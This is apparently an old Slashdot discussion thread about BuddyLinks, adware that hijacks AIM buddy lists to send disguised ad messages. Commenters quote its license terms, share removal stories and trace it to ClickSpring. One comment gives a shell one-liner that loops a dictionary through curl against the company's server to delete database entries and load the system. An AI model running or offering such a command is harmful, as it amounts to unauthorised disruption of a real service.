Buddylinks Stinks

Omie TheNull writes "After recieving several messages over AIM with the content: "check this out... http://www.wgutv.com/osama_capture.php?HlvU", I went to the page and discovered that it is sponsored by a site called "BuddyLinks." Their website is at http://www.buddylinks.net and they claim that they are NOT a virus. However, when you visit their links and install their "player" it seems that you are also installing software that takes control of your AIM buddy list and sends advertisments to those on your buddy list. The advertisements are obviously designed to look like innocent messages from your buddies asking you to check out certain links. Very scummy, indeed."

just take look at the page.

[gl4ss]

it says there very clearly that "soon your instant messaging software will start sending your friends funny news messages like this".

tell your friend that he is an asshole if he uses this.

"3. Open the prize - your friends will love the prize they receive in their funny news message. it might be a game or a funny flash cartoon"

yeah i'd really love that.

4. no need to send any new messages when everybodys ignoring you.

Re:just take look at the page.

[jpsowin]

Looks like you took care of that by giving them a good slashdotting. Good work!

This Kind of Thing Keep Happening...

[GTRacer]

...Only because there are FAR too many people who just don't understand that there are people on the Internet with ulterior motives. I don't want to generalize, but I bet the kind of person easily swayed in this manner is also the telemarketer's best friend.

The more this type of "attack" keeps happening, the more I wonder if there shouldn't be a license or minimum firewall requirement to get on the 'Net.

Maybe we have to start teaching "Safe Surfing" along with Safe Sex in the teen years.

GTRacer
- speechless

Re:This Kind of Thing Keep Happening...

>>Maybe we have to start teaching "Safe Surfing" along with Safe Sex in the teen years.

Just abstain from surfing

Johnny "Come on, just touch it"
Jill "I don't know Johnny, I told my parents I'd wait until I was married"
Johnny "It won't hurt you, just give it a try"
Jill "Are they all this hard and small?"
Johnny "You mean you've never seen a mouse before!"

Re:This Kind of Thing Keep Happening...

[0x0d0a]

This has nothing to do with firewalls. All traffic is going through legitimate programs -- AIM/IE. As a matter of fact, firewalls can make these problems worse, since legitimate people try to tunnel more crap through things like IE requests to avoid having their program set of alarms, etc.

Personal firewalls are, frankly, the worst thing to hit the Net sinc AOL.

It *would* be interesting to sandbox programs that can use the Internet to some degree. This cannot be done on Windows anytime soon (thanks, IE), but could be considered on other platforms.

Vey Scummy Indeed

[orthogonal]

However, when you visit their links and install their "player" it seems that you are also installing software that takes control of your AIM buddy list and sends advertisments to those on your buddy list. The advertisements are obviously designed to look like innocent messages from your buddies asking you to check out certain links. Very scummy, indeed.

What's worse, in an effort to drive traffic to their site, their software hijacks your Slashdot login, forges complaints about their software, and submits those complaints to Slashdot as articles and comments.

You can distinguish their forged posts because invariably the last three words of any forged post are "Very scummy, indeed".

Very scummy, indeed.

Re:Vey Scummy Indeed

[torpor]

godamn it, now that virus has infected my sid and is now getting me to post a follow up to your thread ...

Very scummy, very scummy indeed.

Privacy Policy?

[the+Man+in+Black]

My favorite part of this claptrap. To wit: No, our software doesn't PERSONALLY sell your information and the information of everyone on your buddy list. We're merely a conduit for third-parties to do so, and to give us bags of cash for facilitating it. Do you like my hat? It's made of MONEY.

Funny, I was messing with that last night...

[Hollinger]

Here's a copy of what the messages look like:
InfectedUser (12:30:45 AM): check this out... http://www.wgutv.com/osama_capture.php?hAsH
I'm wondering what that little hash code on the end is...

I haven't personally installed that crud, but I'm wondering if SpyBot (google for it) detects it. I clicked around the site, and, to be honest, it looks like they're setting themselves up for a huge "p2p" (I hate buzzwords) marketing push. I'm going to guess that this "jokes and pranks" business will come to an end when they have a sufficent install base, after which they'll start pushing the next new wave of spam for Viagra, Mortgages, Porn, or *checks his SpamNet folder* Internet gambling on you.

Here's a snippet from the license agreement with my emphasis:
Services; Modifications to Your Instant Messaging Client. The Software provides you the opportunity to access Content for no charge. In return for the right to access this Content, you acknowledge and agree that the Software contains additional software products provided to PSD Tools by its suppliers which will periodically deliver additional Content such as, but not limited to, advertisements and promotional messages to your Computer and programs that may alter your home page to offer you Content. In addition, the Software will interoperate with your current instant messaging client so as to permit the automatic sending of advertising messages originating from your Computer to your contact or "buddy" list regarding Content offered by PSD Tools or its suppliers. If you desire to stop this activity, you may elect to stop the messages by navigating to the "buddylinks.net" entry in your "Start Menu", selecting the "buddylinks.net Configuration" item, and unchecking the appropriate option. You may also refer to PSD Tools' website at http://www.psdtools.com for an uninstaller. (http://www.buddylinks.net/terms.html)

Re:Funny, I was messing with that last night...

[Hollinger]

Got a little click-happy with the submit button...

You also agree to: (from the same URL as the parent post)
Updates to Software. The Software includes an automatic update feature to ensure that you have the most recently released version. You acknowledge and agree that PSD Tools or third parties designated by PSD Tools may from time to time provide automatic programming fixes, updates and upgrades to the Software (collectively, the "Updates"). Updates may include installation of third party applications, through automatic electronic dissemination and other means. You consent to such Updates and agree that the terms and conditions of this Agreement will apply to all such Updates. If you should elect not to have your software updated at any future time, PSD Tools shall not be responsible for any incompatibilities that may arise on your system and Computer.

Oh, and I forgot to mention that the uninstaller is available at http://www.buddylinks.net/uninstaller.exe.

Good day!
Mike

Re:Funny, I was messing with that last night...

[cyberepgnuin]

Spybot doesn't pick this up... yet.

Be careful out there

[Rick+the+Red]

The way to avoid worms, viruses, etc. is to apply some common sense and be careful. For example, never open email attachments when you don't know who sent them.

Another example, which applies here, is to avoid certain software. The "A" in "AIM" stands for AOL; therefore, I've never installed AIM and thus I avoid this latest marketing ploy.

Similarly, the "Windows" in "Windows Messenger" stands for Microsoft Windows, so I disabled it. Yes, I run Windows (because I can't avoid it for a variety of reasons), but I only run it behind an OpenBSD firewall, and I also run ZoneAlarm and Norton Anti-Virus. As Gene Simmons says, if it's raining wear a raincoat.

Mod this "flamebait" if you must, but you know I'm right.

Re:AIM is ASS

[OutRigged]

Um yeah.. Trillian is also closed-source, and quite bloated.

Give me Miranda-IM any day....

Don't go near that site!!

[monkeyserver.com]

Some one at work clicked one of those links (it throws a link in your profile) and her machine was infected. It altered her ie's homepage, and it made it constantly write the page it was viewing to some temp dir. It also installed about 5 other progs. We tried to remove it, first with windows... no good it reinstalled itself,. Then we tried the uninstaller, well that got some of it, but there were still a good few side affects.

MY DEAR LORD!! stay away from these sleezballs, they make bonzia buddy look like a good idea. If anyone is deserving of a serious slashdotting it is them.

It's NOT a virus.

[Matchstick]

It's a trojan!

I've heard

[TheOnlyCoolTim]

The phone number on the WHOIS for wgutv.com will connect you to the guy who wrote the virus... Use this for good, not for evil.

Tim

Re:I've heard

[0x0d0a]

Unlikely. The whois information for wgutv.com refers to a register.com administrator...unless this was intended to be a joke and just went over my head. :-(

Oh my god!

[jarran]

You mean, you downloaded a program being advertised by spam and it was crap?! My god, d'ya reckon it's a one off or should I cancel my penis enlarger and v1agra?

Got it without clicking through

[gc8005]

I got the message from a friend last night thru AIM on my laptop at work. I never got any sort of IE message about installing software - nothing, nil, notta. Looked like a dead link. Now, today, on a totally separate computer, I'm sending AIM messages to everyone in my list. I have NO IDEA how (1) it was installed on my laptop without the pop-up message / approval and (2) how it made it to my home machine (thru AIM?). Also note, contrary to other posts, that this is not removed by using control panel add/remove - it leaves shit all over the machine.

Chew on their database

[0x0d0a]

You can stress-test their system by running the following script:

cat /usr/share/dict/words| perl -pe 'system("curl http://www.buddylinks.net/support.php?sn=$_");' >/dev/null

This will start removing everyone in their database, and will also eat cycles on their system.

PLZ FWD!! Your friends will love you for this.

[Channard]

"3. Open the prize - your friends will love the prize they receive in their funny news message. it might be a game or a funny flash cartoon"

So basically Buddylinks is doing what real people have been doing for ages. Specifically, an aquaintance or friend decides to add your email to their address book, and forwards every piece of crap - virus hoaxes/jokes etc to everyone in their book. Yes, why, thank you vague aquaintance - I really did enjoy that list of hugely stupid jokes you sent me. The repeated quote arrows really made it work. At least with Buddylinks you have to actually install it...

Buddylinks == clickspring

[0x0d0a]

Let's take a brief look at these folks:

$ host buddylinks.net
buddylinks.net has address 63.251.131.235
$ whois 63.251.131.235
[Querying whois.arin.net]
[whois.arin.net]
Internap Network Services NETBLK-PNAP-11-99 (NET-63-251-0-0-1)
63.251.0.0 - 63.251.255.255
ClickSpring LLC INAP-BSN-CLICKSPRING-0041 (NET-63-251-131-232-1)
63.251.131.232 - 63.251.131.239

# ARIN WHOIS database, last updated 2004-02-11 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

Googling for clickspring llc turns up a number of hits. Apparently, ClickSpring has been in the business of writing advertising worms and trojans commercially for some time now. They are responsible for PurityScan as well as some other nasties out there.

Normally I wouldn't care -- another Windows virus -- but now I'm getting masses of useless messages from infected friends.

Obviously, nobody has bothered to charge ClickSpring with computer crime charges, which is quite frusterating.